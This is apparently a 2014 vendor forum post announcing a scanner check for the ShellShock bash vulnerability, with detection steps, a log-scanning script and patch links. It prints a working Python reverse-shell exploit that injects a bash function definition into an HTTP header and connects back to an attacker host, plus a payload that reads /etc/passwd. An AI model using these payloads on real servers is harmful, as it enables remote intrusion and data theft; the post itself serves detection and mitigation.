fmc

New WAS QID 150134 for Bash Bug ShellShock

Discussion created by fmc on Sep 29, 2014

Hello All,


Please read this complete post regarding the new WAS QID 150134 for Bash Bug ShellShock. This QID will go live tonight (09/29/2014).


***PLEASE NOTE: We will be adding additional checks within the next day or so that use a time-delay payload and report the vulnerability if the expected time delay is observed.***


Full details can be found below.


Description:


The ShellShock vulnerability allows an attacker to execute arbitrary commands by leveraging the fact that environment variables can be created with specially crafted values before the Bash shell is invoked. For example, injecting () {test;} ; echo; /bin/cat /etc/passwd into an HTTP header reveals the contents of the /etc/passwd file in the response.


Possible Consequences:


Environment variables with an arbitrary name can carry a malicious function definition, which can lead to remote exploitation. The vulnerability is critical because any application hosted on a web server that uses the mod_cgi/mod_cgid module of Apache HTTP Server, or any code that invokes the bash shell, is vulnerable.


For example, the following is Python reverse-shell exploit code.


A reverse shell allows an attacker's system on an external network to gain unauthorized inbound access to the protected network.


import httplib, sys

if len(sys.argv) < 4:
    print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
    print "Example: %s localhost /cgi-bin/test.cgi 10.10.20.11/80" % sys.argv[0]
    sys.exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
# Bash function-definition prefix followed by the injected command
reverse_shell = "() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
# The payload is sent in a custom header, which mod_cgi exports to the
# CGI script as an environment variable before bash is invoked
headers = {"Content-type": "application/x-www-form-urlencoded", "test": reverse_shell}
conn.request("GET", sys.argv[2], headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data


Our WAS detection technique:


Here are the steps we take to detect the ShellShock vulnerability. We simulate the attack and report the vulnerability if appropriate evidence of arbitrary command execution via bash injection is found.

1. The test begins by injecting a User-Agent header carrying the payload for every unique URL path.

2. The vulnerability is reported if the expected contents are found in the response.

3. The WAS test includes an additional payload designed to get past popular WAF filters for shell-injection payloads.
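Step 1 above uses the User-Agent header as the injection vector. The following is an added defender-side example, not part of the QID or of this post: it scans Apache combined-format access log lines (an assumed format) for the bash function-definition prefix in the User-Agent and Referer fields, using constructed sample lines.

```python
import re

# Bash exports a function through an environment variable whose value starts
# with "() {"; CVE-2014-6271 is triggered by commands appended after the
# closing brace. The pattern matches that prefix, tolerating the whitespace
# variations seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache combined log format (assumed): the three quoted fields are, in order,
# the request line, the Referer header and the User-Agent header.
QUOTED_FIELD_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample log lines (not real traffic); the first User-Agent
# reuses the payload quoted earlier in the post.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Sep/2014:10:15:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() {test;} ; echo; /bin/cat /etc/passwd"
198.51.100.7 - - [29/Sep/2014:10:15:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [29/Sep/2014:10:15:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "( ) { :; }; /usr/bin/id" "curl/7.37.0"
"""


def is_shellshock_payload(value):
    """True if a header value carries the bash function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def scan_access_log(lines):
    """Return one finding per header (Referer or User-Agent) that carries a
    ShellShock-style payload, with the client address and line number."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        fields = QUOTED_FIELD_RE.findall(line)
        if len(fields) < 3:
            continue  # not a combined-format line; skip rather than guess
        client = line.split(" ", 1)[0]
        for header, value in (("Referer", fields[1]), ("User-Agent", fields[2])):
            if is_shellshock_payload(value):
                findings.append({"line": line_no, "client": client,
                                 "header": header, "value": value})
    return findings


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print("line %(line)d %(client)s %(header)s: %(value)s" % hit)
```

The prefix check is intentionally narrow: it flags the function-definition syntax bash honours, so a benign User-Agent containing parentheses, like the Mozilla sample, is not reported.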

 


Mitigation:


The ShellShock vulnerability affects Debian as well as other Linux distributions. Patch the vulnerable operating system or replace bash with an alternate shell. The following is a list of support information for applying an appropriate patch:

  1. Novell/SuSE - http://support.novell.com/security/cve/CVE-2014-6271.html
  2. Debian - https://www.debian.org/security/2014/dsa-3032
  3. Red Hat/Fedora - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-6271
  4. CentOS - http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
  5. Ubuntu - http://www.ubuntu.com/usn/usn-2362-1/

A list of specific distributions is available at http://distrowatch.com/


The major attack vectors identified in this case are HTTP requests and CGI scripts. Disabling mod_cgi/mod_cgid and filtering inputs to vulnerable services are recommended as well.


Additional References:


https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169

 

Thanks,

Frank
